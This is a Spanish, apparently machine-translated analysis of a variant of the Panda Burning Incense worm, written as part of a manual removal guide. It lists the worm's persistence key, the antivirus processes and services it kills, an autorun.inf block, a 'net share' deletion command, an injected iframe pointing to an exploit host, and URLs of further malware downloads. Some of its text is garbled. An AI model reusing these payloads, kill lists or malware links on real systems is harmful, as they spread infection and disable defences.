Programa de eliminación manual de la variante del virus incienso incienso Panda (4)

5. Análisis técnico

1: después de que se ejecute el archivo de virus, cópielo en% SystemRoot% \\ system32 \\ drivers \\ nvscv32.exe

Cree un elemento de inicio automático del registro:

[HKEY_CURRENT_USER \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run \\]

nvscv32: "C: \\ Windows \\ system32 \\ drivers \\ nvscv32.exe"

2: Encuentre el reverso Formulario de virus Proceso relacionado con el fin de virus:

• Skynet Firewall
  
• virusscan
  
• antivirus Symantec
  
• monitor de seguridad del sistema
  
• Ingeniero de reparación del sistema
  
• envuelto asesino de regalos
  
• Maestro de detección de troyanos del juego
  
• Super patrulla
  
  

  3: Finalice el siguiente proceso
  

  • mcshIEld.exe
    
  • vstskmgr.exe
    
  • naprdmgr.exe
    
  • updaterui.exe
    
  • tbmon.exe
    
  • scan32. Exe
    
  • ravmond.exe
    
  • ccenter.exe
    
  • ravtask.exe
    
  • rav.exe
    
  • ravmon.exe
    < LI> ravmond.exe
    
  • ravstub.exe
    
  • kvxp.kxp
    
  • kvmonxp.kxp
    
  • kvcenter.kxp
    
  • kvsrvxp.exe
    
  • kregex.exe
    
  • uihost.exe < Br>
  • trojdIE.kxp
    
  • frogagent.exe
    
  • kvxp.kxp
    
  • kvmonxp.kxp
    
  • kvcenter.kxp
    
  • Kvsrvxp.exe
    
  • kregex.exe
    
  • uihost.exe
    
  • trojdIE.kxp
    
  • frogagent.exe
    
  • logo1_.exe
    
  • logo_1.exe
    
  • rundl132.exe
    
  • taskmgr.exe
    
  • msconfig.exe
    
  • regedit.exe
    
  • sreng .exe
    
    

    4: Deshabilite los siguientes servicios
    

    • programa
      
    • sharedAccess
      
    • rsccenter
      
    • rsravmon
      
    • rsccenter
      
    • kvwsc
      
    • kvsrvxp
      
    • kvwsc
      
    • kvsrvxp
      
    • kavsvc
      
    • avp
      < LI> avp
      
    • kavsvc
      
    • mcafeeframework
      
    • mcshIEld
      
    • mctaskmanager
      
    • mcafeeframework
      
    • mcs HIEld
      
    • mctaskmanager
      
    • navapsvc
      
    • wscsvc
      
    • kpfwsvc
      
    • sndsrvc
      
    • ccproxy
      
    • ccevtmgr
      
    • ccsetmgr
      
    • spbbcsvc
      
    • symantec core lc
      
    • npfmntor
      
    • mskservice
      
    • firesvc
      
      

      5: elimine la siguiente clave de registro:
      

      • software \\ microsoft \\ Windows \\ currentversion \\ run \\ ravtask
        
      • software \\ microsoft \\ Windows \\ currentversion \\ run \\ kvmonxp
        
      • software \\ microsoft \\ Windows \\ currentversion \\ run \\ kav
        
      • software \\ microsoft \\ Windows \\ currentversion \\ run \\ kavpersonal50
        
      • software \\ microsoft \\ Windows \\ currentversion \\ run \\ mcafeeupdaterui < Br>
      • software \\ microsoft \\ Windows \\ currentversion \\ run \\ network asocia el servicio de informes de errores
        
      • software \\ microsoft \\ Windows \\ currentversion \\ run \\ shstatexe
        
      • software \\ microsoft \\ Windows \\ currentversion \\ run \\ ylive.exe
        
      • software \\ microsoft \\ Windows \\ currentversion \\ run \\ yas Sistse
        
        

        6: infecte todos los archivos ejecutables y cambie el ícono a (esta vez no es el ícono del incienso de panda)
        

        7: Omita el siguiente directorio:
        < UL>

      • Windows
        
      • winnt
        
      • systemvolumeinformation
        
      • reciclados
        
      • Windowsnt
        
      • Windowsupdate
        
      • Windowsmediaplayer
        
      • outlookexpress
        
      • netmeeting
        
      • commonfiles
        
      • complusapplications
        
      • commonfiles
        
      • messenger
        
      • installshIEldinstallinformation
        
      • msn
        
      • microsoftFrontPage
        
      • movIEmaker
        
      • msngaminzone
        
        

        8: Eliminar * .gho archivos de copia de seguridad.
        

        9: cree una copia del archivo. setup.exe en todos los directorios raíz de la unidad, cree un archivo autorun.inf para que el virus se ejecute automáticamente y configure los atributos del archivo como ocultos, de solo lectura y de sistema.
        

        autorun.inf content:
        [AutoRun]
        OPEN = setup.exe
        shellexecute = setup.exe
        shell \\ Auto \\ command = setup.exe
        

        10: Eliminar compartir: cmd.exe /c net share admin $ /del /y
        

        11: Agregar < iframe src = http: //www.krvkr.com/a todos los archivos de script en la máquina Worm.htm width = ”0” height = ”0” > < /iframe >, esta dirección de código es un troyano de página web que explota la vulnerabilidad MS-06014, una vez que el usuario navega por la página web del servidor en el virus, si el sistema Si no lo parchea, descargará y ejecutará este virus.
        

        12: analice las máquinas LAN y, una vez que encuentren una vulnerabilidad, se propagarán rápidamente.
        

        13: Visite http: //www en el fondo. Whboy Net /update /wormcn. Txt, descarga otros virus según la lista de descargas.
        

        La lista de descargas actual es la siguiente: (¡Los siguientes enlaces son todos de contenido peligroso, no haga clic!)
        

        • http://www.krvkr.com/down/cq.exe
          
        • http://www.krvkr.com/down/mh.exe
          
        • http://www.krvkr.com/down/my.exe
          
        • http: //Www.krvkr.com/down/wl.exe
          
        • http://www.krvkr.com/down/rx.exe
          
        • http://www.krvkr.com/down/Wow.exe
          
        • http://www.krvkr.com/down/zt.exe
          
        • http://www.krvkr.com/down/wm.exe
          
        • http://www.krvkr.com/down/dj.exe
          
        • http://www.krvkr.com/cn/IEchajian.exe
          
          

          A este comportamiento de virus El análisis está completo.